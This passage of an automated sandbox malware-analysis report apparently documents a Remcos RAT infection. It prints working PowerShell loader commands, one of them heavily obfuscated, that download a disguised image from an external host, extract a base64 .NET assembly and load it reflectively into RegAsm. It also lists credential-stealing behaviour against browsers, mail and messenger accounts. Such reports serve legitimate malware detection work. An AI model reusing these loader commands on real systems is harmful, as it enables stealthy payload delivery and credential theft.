                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qgopainsfhtlahdsndosiegdstrivgqcq"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?e
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.rrve/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?eJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.rrve/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"Jump to behavior
                Source: RegAsm.exe, 0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434C52 cpuid 14_2_00434C52
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_00452036
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,14_2_004520C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,14_2_00452313
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_00448404
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_0045243C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,14_2_00452543
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_00452610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,14_2_0040F8D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,14_2_004488ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,14_2_00451CD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_00451F50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_00451F9B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00448957 GetSystemTimeAsFileTime,14_2_00448957
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041B60D GetComputerNameExW,GetUserNameW,14_2_0041B60D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,14_2_00449190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041739B GetVersionExW,15_2_0041739B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.620697128.0000000000525000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data14_2_0040BA12
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\14_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db14_2_0040BB30
                Searches for Windows Mail specific files
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery NULLJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                Tries to steal Instant Messenger accounts or passwords
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
